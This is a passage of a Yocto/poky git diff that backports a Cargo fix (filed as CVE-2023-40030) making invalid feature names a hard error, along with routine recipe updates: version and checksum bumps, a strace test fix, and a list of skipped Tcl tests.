`9`)\n\ +- {}", +- ch, name, pkg_id, FUTURE +- ))?; ++ (most letters or `_` or `0` to `9`)", ++ ch, ++ name, ++ pkg_id ++ ); + } + } + for ch in chars { + if !(unicode_xid::UnicodeXID::is_xid_continue(ch) || ch == '-' || ch == '+' || ch == '.') { +- config.shell().warn(&format!( ++ bail!( + "invalid character `{}` in feature `{}` in package {}, \ + characters must be Unicode XID characters, `+`, or `.` \ +- (numbers, `+`, `-`, `_`, `.`, or most letters)\n\ +- {}", +- ch, name, pkg_id, FUTURE +- ))?; ++ (numbers, `+`, `-`, `_`, `.`, or most letters)", ++ ch, ++ name, ++ pkg_id ++ ); + } + } + Ok(()) + } ++ ++#[cfg(test)] ++mod tests { ++ use super::*; ++ use crate::sources::CRATES_IO_INDEX; ++ use crate::util::into_url::IntoUrl; ++ ++ use crate::core::SourceId; ++ ++ #[test] ++ fn valid_feature_names() { ++ let loc = CRATES_IO_INDEX.into_url().unwrap(); ++ let source_id = SourceId::for_registry(&loc).unwrap(); ++ let pkg_id = PackageId::new("foo", "1.0.0", source_id).unwrap(); ++ ++ assert!(validate_feature_name(pkg_id, "c++17").is_ok()); ++ assert!(validate_feature_name(pkg_id, "128bit").is_ok()); ++ assert!(validate_feature_name(pkg_id, "_foo").is_ok()); ++ assert!(validate_feature_name(pkg_id, "feat-name").is_ok()); ++ assert!(validate_feature_name(pkg_id, "feat_name").is_ok()); ++ assert!(validate_feature_name(pkg_id, "foo.bar").is_ok()); ++ ++ assert!(validate_feature_name(pkg_id, "+foo").is_err()); ++ assert!(validate_feature_name(pkg_id, "-foo").is_err()); ++ assert!(validate_feature_name(pkg_id, ".foo").is_err()); ++ assert!(validate_feature_name(pkg_id, "foo:bar").is_err()); ++ assert!(validate_feature_name(pkg_id, "foo?").is_err()); ++ assert!(validate_feature_name(pkg_id, "?foo").is_err()); ++ assert!(validate_feature_name(pkg_id, "ⒶⒷⒸ").is_err()); ++ assert!(validate_feature_name(pkg_id, "a¼").is_err()); ++ } ++} +diff --git a/src/tools/cargo/src/cargo/sources/registry/index.rs b/src/tools/cargo/src/cargo/sources/registry/index.rs +index aa5c2a78c..6d565da8f 100644 +--- a/src/tools/cargo/src/cargo/sources/registry/index.rs ++++ b/src/tools/cargo/src/cargo/sources/registry/index.rs +@@ -293,7 +293,6 @@ impl<'cfg> RegistryIndex<'cfg> + 'a: 'b, + { + let source_id = self.source_id; +- let config = self.config; + + // First up actually parse what summaries we have available. If Cargo + // has run previously this will parse a Cargo-specific cache file rather +@@ -312,15 +311,13 @@ impl<'cfg> RegistryIndex<'cfg> { + .versions + .iter_mut() + .filter_map(move |(k, v)| if req.matches(k) { Some(v) } else { None }) +- .filter_map( +- move |maybe| match maybe.parse(config, raw_data, source_id) { ++ .filter_map(move |maybe| match maybe.parse(raw_data, source_id) { + Ok(summary) => Some(summary), + Err(e) => { + info!("failed to parse `{}` registry package: {}", name, e); + None + } +- }, +- ) ++ }) + .filter(move |is| { + if is.v > INDEX_V_MAX { + debug!( +@@ -605,7 +602,7 @@ impl Summaries { + // allow future cargo implementations to break the + // interpretation of each line here and older cargo will simply + // ignore the new lines. +- let summary = match IndexSummary::parse(config, line, source_id) { ++ let summary = match IndexSummary::parse(line, source_id) { + Ok(summary) => summary, + Err(e) => { + // This should only happen when there is an index +@@ -793,17 +790,12 @@ impl MaybeIndexSummary { + /// Does nothing if this is already `Parsed`, and otherwise the `raw_data` + /// passed in is sliced with the bounds in `Unparsed` and then actually + /// parsed. +- fn parse( +- &mut self, +- config: &Config, +- raw_data: &[u8], +- source_id: SourceId, +- ) -> CargoResult<&IndexSummary> { ++ fn parse(&mut self, raw_data: &[u8], source_id: SourceId,) -> CargoResult<&IndexSummary> { + let (start, end) = match self { + MaybeIndexSummary::Unparsed { start, end } => (*start, *end), + MaybeIndexSummary::Parsed(summary) => return Ok(summary), + }; +- let summary = IndexSummary::parse(config, &raw_data[start..end], source_id)?; ++ let summary = IndexSummary::parse(&raw_data[start..end], source_id)?; + *self = MaybeIndexSummary::Parsed(summary); + match self { + MaybeIndexSummary::Unparsed { .. } => unreachable!(), +@@ -823,7 +815,7 @@ impl IndexSummary { + /// a package. + /// + /// The `line` provided is expected to be valid JSON. +- fn parse(config: &Config, line: &[u8], source_id: SourceId) -> CargoResult<IndexSummary> { ++ fn parse(line: &[u8], source_id: SourceId) -> CargoResult<IndexSummary> { + // ****CAUTION**** Please be extremely careful with returning errors + // from this function. Entries that error are not included in the + // index cache, and can cause cargo to get confused when switching +@@ -853,7 +845,7 @@ impl IndexSummary { + features.entry(name).or_default().extend(values); + } + } +- let mut summary = Summary::new(config, pkgid, deps, &features, links)?; ++ let mut summary = Summary::new(pkgid, deps, &features, links)?; + summary.set_checksum(cksum); + Ok(IndexSummary { + summary, + +diff --git a/src/tools/cargo/src/cargo/util/toml/mod.rs b/src/tools/cargo/src/cargo/util/toml/mod.rs +index 1cc32dee8..a32f0384b 100644 +--- a/src/tools/cargo/src/cargo/util/toml/mod.rs ++++ b/src/tools/cargo/src/cargo/util/toml/mod.rs +@@ -2432,7 +2432,6 @@ impl TomlManifest { + let empty_features = BTreeMap::new(); + + let summary = Summary::new( +- config, + pkgid, + deps, + me.features.as_ref().unwrap_or(&empty_features), +diff --git a/src/tools/cargo/tests/testsuite/features.rs b/src/tools/cargo/tests/testsuite/features.rs +index 848e05677..557fab14a 100644 +--- a/src/tools/cargo/tests/testsuite/features.rs ++++ b/src/tools/cargo/tests/testsuite/features.rs +@@ -1937,8 +1937,8 @@ fn nonexistent_required_features() { + } + + #[cargo_test] +-fn invalid_feature_names_warning() { +- // Warnings for more restricted feature syntax. ++fn invalid_feature_names_error() { ++ // Errors for more restricted feature syntax. + let p = project() + .file( + "Cargo.toml", +@@ -1948,72 +1948,57 @@ fn invalid_feature_names_warning() { + version = "0.1.0" + + [features] +- # Some valid, but unusual names, shouldn't warn. +- "c++17" = [] +- "128bit" = [] +- "_foo" = [] +- "feat-name" = [] +- "feat_name" = [] +- "foo.bar" = [] +- +- # Invalid names. ++ # Invalid start character. + "+foo" = [] +- "-foo" = [] +- ".foo" = [] +- "foo:bar" = [] +- "foo?" = [] +- "?foo" = [] +- "ⒶⒷⒸ" = [] +- "a¼" = [] + "#, + ) + .file("src/lib.rs", "") + .build(); + +- // Unfortunately the warnings are duplicated due to the Summary being +- // loaded twice (once in the Workspace, and once in PackageRegistry) and +- // Cargo does not have a de-duplication system. This should probably be +- // OK, since I'm not expecting this to affect anyone. + p.cargo("check") +- .with_stderr("\ +-[WARNING] invalid character `+` in feature `+foo` in package foo v0.1.0 ([ROOT]/foo), the first character must be a Unicode XID start character or digit (most letters or `_` or `0` to `9`) +-This was previously accepted but is being phased out; it will become a hard error in a future release. +-For more information, see issue #8813 <https://github.com/rust-lang/cargo/issues/8813>, and please leave a comment if this will be a problem for your project. +-[WARNING] invalid character `-` in feature `-foo` in package foo v0.1.0 ([ROOT]/foo), the first character must be a Unicode XID start character or digit (most letters or `_` or `0` to `9`) +-This was previously accepted but is being phased out; it will become a hard error in a future release. +-For more information, see issue #8813 <https://github.com/rust-lang/cargo/issues/8813>, and please leave a comment if this will be a problem for your project. +-[WARNING] invalid character `.` in feature `.foo` in package foo v0.1.0 ([ROOT]/foo), the first character must be a Unicode XID start character or digit (most letters or `_` or `0` to `9`) +-This was previously accepted but is being phased out; it will become a hard error in a future release. +-For more information, see issue #8813 <https://github.com/rust-lang/cargo/issues/8813>, and please leave a comment if this will be a problem for your project. +-[WARNING] invalid character `?` in feature `?foo` in package foo v0.1.0 ([ROOT]/foo), the first character must be a Unicode XID start character or digit (most letters or `_` or `0` to `9`) +-This was previously accepted but is being phased out; it will become a hard error in a future release. +-For more information, see issue #8813 <https://github.com/rust-lang/cargo/issues/8813>, and please leave a comment if this will be a problem for your project. +-[WARNING] invalid character `¼` in feature `a¼` in package foo v0.1.0 ([ROOT]/foo), characters must be Unicode XID characters, `+`, or `.` (numbers, `+`, `-`, `_`, `.`, or most letters) +-This was previously accepted but is being phased out; it will become a hard error in a future release. +-For more information, see issue #8813 <https://github.com/rust-lang/cargo/issues/8813>, and please leave a comment if this will be a problem for your project. +-[WARNING] invalid character `:` in feature `foo:bar` in package foo v0.1.0 ([ROOT]/foo), characters must be Unicode XID characters, `+`, or `.` (numbers, `+`, `-`, `_`, `.`, or most letters) +-This was previously accepted but is being phased out; it will become a hard error in a future release. +-For more information, see issue #8813 <https://github.com/rust-lang/cargo/issues/8813>, and please leave a comment if this will be a problem for your project. +-[WARNING] invalid character `?` in feature `foo?` in package foo v0.1.0 ([ROOT]/foo), characters must be Unicode XID characters, `+`, or `.` (numbers, `+`, `-`, `_`, `.`, or most letters) +-This was previously accepted but is being phased out; it will become a hard error in a future release. +-For more information, see issue #8813 <https://github.com/rust-lang/cargo/issues/8813>, and please leave a comment if this will be a problem for your project. +-[WARNING] invalid character `Ⓐ` in feature `ⒶⒷⒸ` in package foo v0.1.0 ([ROOT]/foo), the first character must be a Unicode XID start character or digit (most letters or `_` or `0` to `9`) +-This was previously accepted but is being phased out; it will become a hard error in a future release. +-For more information, see issue #8813 <https://github.com/rust-lang/cargo/issues/8813>, and please leave a comment if this will be a problem for your project. +-[WARNING] invalid character `Ⓑ` in feature `ⒶⒷⒸ` in package foo v0.1.0 ([ROOT]/foo), characters must be Unicode XID characters, `+`, or `.` (numbers, `+`, `-`, `_`, `.`, or most letters) +-This was previously accepted but is being phased out; it will become a hard error in a future release. +-For more information, see issue #8813 <https://github.com/rust-lang/cargo/issues/8813>, and please leave a comment if this will be a problem for your project. +-[WARNING] invalid character `Ⓒ` in feature `ⒶⒷⒸ` in package foo v0.1.0 ([ROOT]/foo), characters must be Unicode XID characters, `+`, or `.` (numbers, `+`, `-`, `_`, `.`, or most letters) +-This was previously accepted but is being phased out; it will become a hard error in a future release. +-For more information, see issue #8813 <https://github.com/rust-lang/cargo/issues/8813>, and please leave a comment if this will be a problem for your project. +-[CHECKING] foo v0.1.0 [..] +-[FINISHED] [..] +-") ++ .with_status(101) ++ .with_stderr( ++ "\ ++error: failed to parse manifest at `[ROOT]/foo/Cargo.toml` ++ ++Caused by: ++ invalid character `+` in feature `+foo` in package foo v0.1.0 ([ROOT]/foo), \ ++ the first character must be a Unicode XID start character or digit \ ++ (most letters or `_` or `0` to `9`) ++", ++ ) ++ .run(); ++ ++ p.change_file( ++ "Cargo.toml", ++ r#" ++ [package] ++ name = "foo" ++ version = "0.1.0" ++ ++ [features] ++ # Invalid continue character. ++ "a&b" = [] ++ "#, ++ ); ++ ++ p.cargo("check") ++ .with_status(101) ++ .with_stderr( ++ "\ ++error: failed to parse manifest at `[ROOT]/foo/Cargo.toml` ++ ++Caused by: ++ invalid character `&` in feature `a&b` in package foo v0.1.0 ([ROOT]/foo), \ ++ characters must be Unicode XID characters, `+`, or `.` \ ++ (numbers, `+`, `-`, `_`, `.`, or most letters) ++", ++ ) + .run(); + } + + #[cargo_test] +-fn invalid_feature_names_error() { ++fn invalid_feature_name_slash_error() { + // Errors for more restricted feature syntax. + let p = project() + .file( diff --git a/poky/meta/recipes-devtools/rust/rust-source.inc b/poky/meta/recipes-devtools/rust/rust-source.inc index 4a720e645b..086375a3c6 100644 --- a/poky/meta/recipes-devtools/rust/rust-source.inc +++ b/poky/meta/recipes-devtools/rust/rust-source.inc @@ -7,6 +7,7 @@ SRC_URI += "https://static.rust-lang.org/dist/rustc-${RUST_VERSION}-src.tar.xz;n file://zlib-off64_t.patch;patchdir=${RUSTSRC} \ file://0001-musl-Define-SOCK_SEQPACKET-in-common-place.patch;patchdir=${RUSTSRC} \ file://bootstrap_fail.patch;patchdir=${RUSTSRC} \ + file://0002-CVE-2023-40030.patch;patchdir=${RUSTSRC} \ " SRC_URI[rust.sha256sum] = "bb8e9c564566b2d3228d95de9063a9254182446a161353f1d843bfbaf5c34639" diff --git a/poky/meta/recipes-devtools/strace/strace/skip-test-so_peerpidfd.gen.test.patch b/poky/meta/recipes-devtools/strace/strace/skip-test-so_peerpidfd.gen.test.patch deleted file mode 100644 index 5c73e1f10e..0000000000 --- a/poky/meta/recipes-devtools/strace/strace/skip-test-so_peerpidfd.gen.test.patch +++ /dev/null @@ -1,25 +0,0 @@ -From 002d9f2512245536dfc8d62db429d97e2216ec3a Mon Sep 17 00:00:00 2001 -From: Randy MacLeod <Randy.MacLeod@windriver.com> -Date: Fri, 6 Oct 2023 12:08:23 -0700 -Subject: [PATCH] skip tests/so_peerpidfd.gen.test - -Upstream-Status: Inappropriate - -Signed-off-by: Randy MacLeod <Randy.MacLeod@windriver.com> ---- - tests/so_peerpidfd.gen.test | 1 + - 1 file changed, 1 insertion(+) - -diff --git a/tests/so_peerpidfd.gen.test b/tests/so_peerpidfd.gen.test -index 64ad3a2..f89da9f 100755 ---- a/tests/so_peerpidfd.gen.test -+++ b/tests/so_peerpidfd.gen.test -@@ -1,4 +1,5 @@ - #!/bin/sh -efu - # Generated by ./tests/gen_tests.sh from ./tests/gen_tests.in (so_peerpidfd --trace=getsockopt -y); do not edit. - . "${srcdir=.}/init.sh" -+skip_ "Test fails due to apparently trivial log format differences" - run_strace_match_diff --trace=getsockopt -y --- -2.39.0 - diff --git a/poky/meta/recipes-devtools/strace/strace/tests-fix-so_peerpidfd-test.patch b/poky/meta/recipes-devtools/strace/strace/tests-fix-so_peerpidfd-test.patch new file mode 100644 index 0000000000..62f73d3643 --- /dev/null +++ b/poky/meta/recipes-devtools/strace/strace/tests-fix-so_peerpidfd-test.patch @@ -0,0 +1,32 @@ +From 44cf51a38cce1e90bb6c22208fa45f95cdcc8f5d Mon Sep 17 00:00:00 2001 +From: "Dmitry V. Levin" <ldv@strace.io> +Date: Sat, 14 Oct 2023 08:00:00 +0000 +Subject: [PATCH] tests: fix so_peerpidfd test + +* tests/so_peerpidfd.c (print_pidfd): Fix expected output. + +Fixes: v6.5~38 "net: implement decoding of SO_PEERPIDFD socket option" +Resolves: https://bugzilla.redhat.com/show_bug.cgi?id=2243631 + +Upstream-Status: Backport [https://github.com/strace/strace/commit/44cf51a38cce1e90bb6c22208fa45f95cdcc8f5d] +Signed-off-by: Randy MacLeod <Randy.MacLeod@windriver.com> +--- + tests/so_peerpidfd.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/tests/so_peerpidfd.c b/tests/so_peerpidfd.c +index 33988edec..dfad1c434 100644 +--- a/tests/so_peerpidfd.c ++++ b/tests/so_peerpidfd.c +@@ -37,7 +37,7 @@ print_pidfd(int *p) + if (rc < 0) + printf("%p", p); + else +- printf("%d%s", *p, pidfd_suffix); ++ printf("[%d%s]", *p, pidfd_suffix); + } + + static void +-- +2.34.1 + diff --git a/poky/meta/recipes-devtools/strace/strace_6.5.bb b/poky/meta/recipes-devtools/strace/strace_6.5.bb index d6475e8db9..d1536b1e8d 100644 --- a/poky/meta/recipes-devtools/strace/strace_6.5.bb +++ b/poky/meta/recipes-devtools/strace/strace_6.5.bb @@ -14,7 +14,7 @@ SRC_URI = "https://strace.io/files/${PV}/strace-${PV}.tar.xz \ file://skip-load.patch \ file://0001-configure-Use-autoconf-macro-to-detect-largefile-sup.patch \ file://0002-tests-Replace-off64_t-with-off_t.patch \ - file://skip-test-so_peerpidfd.gen.test.patch \ + file://tests-fix-so_peerpidfd-test.patch \ " SRC_URI[sha256sum] = "dfb051702389e1979a151892b5901afc9e93bbc1c70d84c906ade3224ca91980" diff --git a/poky/meta/recipes-devtools/tcltk/tcl/run-ptest b/poky/meta/recipes-devtools/tcltk/tcl/run-ptest index 5b9127784e..87e025fce1 100644 --- a/poky/meta/recipes-devtools/tcltk/tcl/run-ptest +++ b/poky/meta/recipes-devtools/tcltk/tcl/run-ptest @@ -3,7 +3,11 @@ # clock.test needs a timezone to be set export TZ="Europe/London" export TCL_LIBRARY=library -SKIPPED_TESTS= + +# Some tests are overly strict with timings and fail on loaded systems. +# See bugs #14825 #14882 #15081 #15321. +SKIPPED_TESTS='async-* cmdMZ-6.6 event-* exit-1.* socket-* socket_inet-*' + for i in `ls tests/*.test | awk -F/ '{print $2}'`; do ./tcltest tests/all.tcl -file $i -skip "$SKIPPED_TESTS" >$i.log 2>&1 grep -q -F -e "Files with failing tests:" -e "Test files exiting with errors:" $i.log diff --git a/poky/meta/recipes-extended/cups/cups.inc b/poky/meta/recipes-extended/cups/cups.inc index fa32c38549..4c414b6549 100644 --- a/poky/meta/recipes-extended/cups/cups.inc +++ b/poky/meta/recipes-extended/cups/cups.inc @@ -55,7 +55,7 @@ EXTRA_OECONF = " \ --enable-debug \ --disable-relro \ --enable-libusb \ - --with-system-groups=lpadmin \ + --with-system-groups=lpadmin,root,sys,wheel \ --with-cups-group=lp \ --with-domainsocket=/run/cups/cups.sock \ --with-pkgconfpath=${libdir}/pkgconfig \ diff --git a/poky/meta/recipes-extended/ghostscript/ghostscript_10.02.0.bb b/poky/meta/recipes-extended/ghostscript/ghostscript_10.02.1.bb index 4bad0f86e1..18c296128a 100644 --- a/poky/meta/recipes-extended/ghostscript/ghostscript_10.02.0.bb +++ b/poky/meta/recipes-extended/ghostscript/ghostscript_10.02.1.bb @@ -28,7 +28,7 @@ SRC_URI = "https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/downlo file://configure.ac-add-option-to-explicitly-disable-neon.patch \ " -SRC_URI[sha256sum] = "e54062f166708d84ca82de9f8304a04344466080f936118b88082bd55ed6dc97" +SRC_URI[sha256sum] = "e429e4f5b01615a4f0f93a4128e8a1a4d932dff983b1774174c79c0630717ad9" PACKAGECONFIG ??= "" PACKAGECONFIG[gtk] = "--enable-gtk,--disable-gtk,gtk+3" diff --git a/poky/meta/recipes-extended/libnsl/libnsl2_git.bb b/poky/meta/recipes-extended/libnsl/libnsl2_git.bb index 7919ef9b24..8cc1f7cec3 100644 --- a/poky/meta/recipes-extended/libnsl/libnsl2_git.bb +++ b/poky/meta/recipes-extended/libnsl/libnsl2_git.bb @@ -10,9 +10,9 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c" SECTION = "libs" DEPENDS = "libtirpc" -PV = "2.0.0" +PV = "2.0.1" -SRCREV = "82245c0c58add79a8e34ab0917358217a70e5100" +SRCREV = "d4b22e54b5e6637a69b26eab5faad2a326c9b182" SRC_URI = "git://github.com/thkukuk/libnsl;branch=master;protocol=https \ " diff --git a/poky/meta/recipes-extended/libsolv/libsolv_0.7.25.bb b/poky/meta/recipes-extended/libsolv/libsolv_0.7.26.bb index 69cb3f7996..bae7960138 100644 --- a/poky/meta/recipes-extended/libsolv/libsolv_0.7.25.bb +++ b/poky/meta/recipes-extended/libsolv/libsolv_0.7.26.bb @@ -12,7 +12,7 @@ SRC_URI = "git://github.com/openSUSE/libsolv.git;branch=master;protocol=https \ file://0001-utils-Conside-musl-when-wrapping-qsort_r.patch \ " -SRCREV = "f1be8bf3dcc7dc14d331adbc97f337fa08e641c9" +SRCREV = "48c985375134d2443eee551613161cadc278af2f" UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+(\.\d+)+)" diff --git a/poky/meta/recipes-extended/lsb/lsb-release_1.4.bb b/poky/meta/recipes-extended/lsb/lsb-release_1.4.bb index ad16554e98..00d8183a4f 100644 --- a/poky/meta/recipes-extended/lsb/lsb-release_1.4.bb +++ b/poky/meta/recipes-extended/lsb/lsb-release_1.4.bb @@ -14,10 +14,9 @@ SRC_URI = "${SOURCEFORGE_MIRROR}/project/lsb/lsb_release/1.4/lsb-release-1.4.tar file://help2man-reproducibility.patch \ " -SRC_URI[md5sum] = "30537ef5a01e0ca94b7b8eb6a36bb1e4" SRC_URI[sha256sum] = "99321288f8d62e7a1d485b7c6bdccf06766fb8ca603c6195806e4457fdf17172" -UPSTREAM_CHECK_URI = "http://sourceforge.net/projects/lsb/files/lsb_release/" +UPSTREAM_CHECK_URI = "https://sourceforge.net/projects/lsb/files/lsb_release/" UPSTREAM_CHECK_REGEX = "/lsb_release/(?P<pver>(\d+[\.\-_]*)+)/" CLEANBROKEN = "1" diff --git a/poky/meta/recipes-extended/msmtp/msmtp_1.8.24.bb b/poky/meta/recipes-extended/msmtp/msmtp_1.8.25.bb index b8c867161b..b575fad5e1 100644 --- a/poky/meta/recipes-extended/msmtp/msmtp_1.8.24.bb +++ b/poky/meta/recipes-extended/msmtp/msmtp_1.8.25.bb @@ -11,7 +11,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504" UPSTREAM_CHECK_URI = "https://marlam.de/msmtp/download/" SRC_URI = "https://marlam.de/${BPN}/releases/${BP}.tar.xz" -SRC_URI[sha256sum] = "bd6644b1aaab17d61b86647993e3efad860b23c54283b00ddc579c1f5110aa59" +SRC_URI[sha256sum] = "2dfe1dbbb397d26fe0b0b6b2e9cd2efdf9d72dd42d18e70d7f363ada2652d738" inherit gettext autotools update-alternatives pkgconfig diff --git a/poky/meta/recipes-extended/newt/libnewt_0.52.23.bb b/poky/meta/recipes-extended/newt/libnewt_0.52.24.bb index cd3731cf74..1e39a1c5ca 100644 --- a/poky/meta/recipes-extended/newt/libnewt_0.52.23.bb +++ b/poky/meta/recipes-extended/newt/libnewt_0.52.24.bb @@ -23,7 +23,7 @@ SRC_URI = "https://releases.pagure.org/newt/newt-${PV}.tar.gz \ file://0001-detect-gold-as-GNU-linker-too.patch \ " -SRC_URI[sha256sum] = "caa372907b14ececfe298f0d512a62f41d33b290610244a58aed07bbc5ada12a" +SRC_URI[sha256sum] = "5ded7e221f85f642521c49b1826c8de19845aa372baf5d630a51774b544fbdbb" S = "${WORKDIR}/newt-${PV}" diff --git a/poky/meta/recipes-extended/timezone/timezone.inc b/poky/meta/recipes-extended/timezone/timezone.inc index 14a1ce18f3..2774e5e730 100644 --- a/poky/meta/recipes-extended/timezone/timezone.inc +++ b/poky/meta/recipes-extended/timezone/timezone.inc @@ -6,7 +6,7 @@ SECTION = "base" LICENSE = "PD & BSD-3-Clause" LIC_FILES_CHKSUM = "file://LICENSE;md5=c679c9d6b02bc2757b3eaf8f53c43fba" -PV = "2023c" +PV = "2023d" SRC_URI =" http://www.iana.org/time-zones/repository/releases/tzcode${PV}.tar.gz;name=tzcode;subdir=tz \ http://www.iana.org/time-zones/repository/releases/tzdata${PV}.tar.gz;name=tzdata;subdir=tz \ @@ -16,5 +16,5 @@ S = "${WORKDIR}/tz" UPSTREAM_CHECK_URI = "http://www.iana.org/time-zones" -SRC_URI[tzcode.sha256sum] = "46d17f2bb19ad73290f03a203006152e0fa0d7b11e5b71467c4a823811b214e7" -SRC_URI[tzdata.sha256sum] = "3f510b5d1b4ae9bb38e485aa302a776b317fb3637bdb6404c4adf7b6cadd965c" +SRC_URI[tzcode.sha256sum] = "e9a5f9e118886d2de92b62bb05510a28cc6c058d791c93bd6b84d3292c3c161e" +SRC_URI[tzdata.sha256sum] = "dbca21970b0a8b8c0ceceec1d7b91fa903be0f6eca5ae732b5329672232a08f3" diff --git a/poky/meta/recipes-gnome/gtk+/gtk+3.inc b/poky/meta/recipes-gnome/gtk+/gtk+3.inc index 8d01e6077f..4a04c06432 100644 --- a/poky/meta/recipes-gnome/gtk+/gtk+3.inc +++ b/poky/meta/recipes-gnome/gtk+/gtk+3.inc @@ -41,7 +41,7 @@ PACKAGECONFIG[x11] = "-Dx11_backend=true,-Dx11_backend=false,at-spi2-atk fontcon # this is provided by oe-core patch that removes epoxy/gl dependency from a X11 build PACKAGECONFIG[opengl] = "-Dopengl=true,-Dopengl=false,libepoxy" PACKAGECONFIG[wayland] = "-Dwayland_backend=true,-Dwayland_backend=false,wayland wayland-protocols libxkbcommon virtual/egl virtual/libgles2 wayland-native" -PACKAGECONFIG[cups] = ",,cups,cups" +PACKAGECONFIG[cups] = ",,cups,cups gtk3-printbackend-cups" PACKAGECONFIG[colord] = "-Dcolord=yes,-Dcolord=no,colord" PACKAGECONFIG[cloudproviders] = "-Dcloudproviders=true,-Dcloudproviders=false,libcloudproviders" PACKAGECONFIG[tracker3] = "-Dtracker3=true,-Dtracker3=false,tracker,tracker-miners" diff --git a/poky/meta/recipes-gnome/gtk+/gtk4_4.12.3.bb b/poky/meta/recipes-gnome/gtk+/gtk4_4.12.3.bb index a547db8376..001b06934e 100644 --- a/poky/meta/recipes-gnome/gtk+/gtk4_4.12.3.bb +++ b/poky/meta/recipes-gnome/gtk+/gtk4_4.12.3.bb @@ -66,7 +66,7 @@ PACKAGECONFIG:class-nativesdk = "${@bb.utils.filter('DISTRO_FEATURES', 'x11', d) PACKAGECONFIG[x11] = "-Dx11-backend=true,-Dx11-backend=false,at-spi2-atk fontconfig libx11 libxext libxcursor libxi libxdamage libxrandr libxrender libxcomposite libxfixes xinerama" PACKAGECONFIG[wayland] = "-Dwayland-backend=true,-Dwayland-backend=false,wayland wayland-protocols virtual/egl virtual/libgles2 wayland-native" PACKAGECONFIG[cloudproviders] = "-Dcloudproviders=enabled,-Dcloudproviders=disabled,libcloudproviders" -PACKAGECONFIG[cups] = "-Dprint-cups=enabled,-Dprint-cups=disabled,cups,cups" +PACKAGECONFIG[cups] = "-Dprint-cups=enabled,-Dprint-cups=disabled,cups,cups gtk4-printbackend-cups" PACKAGECONFIG[colord] = "-Dcolord=enabled,-Dcolord=disabled,colord" PACKAGECONFIG[iso-codes] = ",,iso-codes,iso-codes" PACKAGECONFIG[ffmpeg] = "-Dmedia-ffmpeg=enabled,-Dmedia-ffmpeg=disabled,ffmpeg" diff --git a/poky/meta/recipes-graphics/harfbuzz/harfbuzz_8.2.1.bb b/poky/meta/recipes-graphics/harfbuzz/harfbuzz_8.2.2.bb index df41af29f9..ce1a6bed65 100644 --- a/poky/meta/recipes-graphics/harfbuzz/harfbuzz_8.2.1.bb +++ b/poky/meta/recipes-graphics/harfbuzz/harfbuzz_8.2.2.bb @@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b98429b8e8e3c2a67cfef01e99e4893d \ " SRC_URI = "${GITHUB_BASE_URI}/download/${PV}/${BPN}-${PV}.tar.xz" -SRC_URI[sha256sum] = "0fec78f98c9c8faf228957a201c8846f809452c20f8445eb092a1ba6f22dbea5" +SRC_URI[sha256sum] = "e433ad85fbdf57f680be29479b3f964577379aaf319f557eb76569f0ecbc90f3" DEPENDS += "glib-2.0-native" diff --git a/poky/meta/recipes-graphics/jpeg/libjpeg-turbo_3.0.0.bb b/poky/meta/recipes-graphics/jpeg/libjpeg-turbo_3.0.1.bb index 146d80008c..99ed82dac4 100644 --- a/poky/meta/recipes-graphics/jpeg/libjpeg-turbo_3.0.0.bb +++ b/poky/meta/recipes-graphics/jpeg/libjpeg-turbo_3.0.1.bb @@ -10,7 +10,7 @@ DEPENDS:append:x86:class-target = " nasm-native" SRC_URI = "${SOURCEFORGE_MIRROR}/${BPN}/${BPN}-${PV}.tar.gz" -SRC_URI[sha256sum] = "c77c65fcce3d33417b2e90432e7a0eb05f59a7fff884022a9d931775d583bfaa" +SRC_URI[sha256sum] = "22429507714ae147b3acacd299e82099fce5d9f456882fc28e252e4579ba2a75" UPSTREAM_CHECK_URI = "http://sourceforge.net/projects/libjpeg-turbo/files/" UPSTREAM_CHECK_REGEX = "/libjpeg-turbo/files/(?P<pver>(\d+[\.\-_]*)+)/" diff --git a/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg_21.1.8.bb b/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg_21.1.9.bb index 19db7ea434..43c06181e3 100644 --- a/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg_21.1.8.bb +++ b/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg_21.1.9.bb @@ -3,7 +3,7 @@ require xserver-xorg.inc SRC_URI += "file://0001-xf86pciBus.c-use-Intel-ddx-only-for-pre-gen4-hardwar.patch \ file://0001-Avoid-duplicate-definitions-of-IOPortBase.patch \ " -SRC_URI[sha256sum] = "38aadb735650c8024ee25211c190bf8aad844c5f59632761ab1ef4c4d5aeb152" +SRC_URI[sha256sum] = "ff697be2011b4c4966b7806929e51b7a08e9d33800d505305d26d9ccde4b533a" # These extensions are now integrated into the server, so declare the migration # path for in-place upgrades. diff --git a/poky/meta/recipes-graphics/xwayland/xwayland_23.2.1.bb b/poky/meta/recipes-graphics/xwayland/xwayland_23.2.2.bb index e97a921a96..9feac147db 100644 --- a/poky/meta/recipes-graphics/xwayland/xwayland_23.2.1.bb +++ b/poky/meta/recipes-graphics/xwayland/xwayland_23.2.2.bb @@ -10,7 +10,7 @@ LICENSE = "MIT" LIC_FILES_CHKSUM = "file://COPYING;md5=5df87950af51ac2c5822094553ea1880" SRC_URI = "https://www.x.org/archive/individual/xserver/xwayland-${PV}.tar.xz" -SRC_URI[sha256sum] = "eebc2692c3aa80617d78428bc6ec7b91b254a98214d2a70e997098503cd6ef90" +SRC_URI[sha256sum] = "9f7c0938d2a41e941ffa04f99c35e5db2bcd3eec034afe8d35d5c810a22eb0a8" UPSTREAM_CHECK_REGEX = "xwayland-(?P<pver>\d+(\.(?!90\d)\d+)+)\.tar" diff --git a/poky/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb b/poky/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb index 3fcfe4b4c3..941160ea9c 100644 --- a/poky/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb +++ b/poky/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb @@ -11,7 +11,7 @@ LIC_FILES_CHKSUM = "\ DEPENDS = "git-native" -SRCREV = "6645d3897cc2eeb1237ee0e2ff5342bd73ee0875" +SRCREV = "7160ebe8b865dd6028aef278efa219433db93f7e" PV = "0.3+git" inherit native diff --git 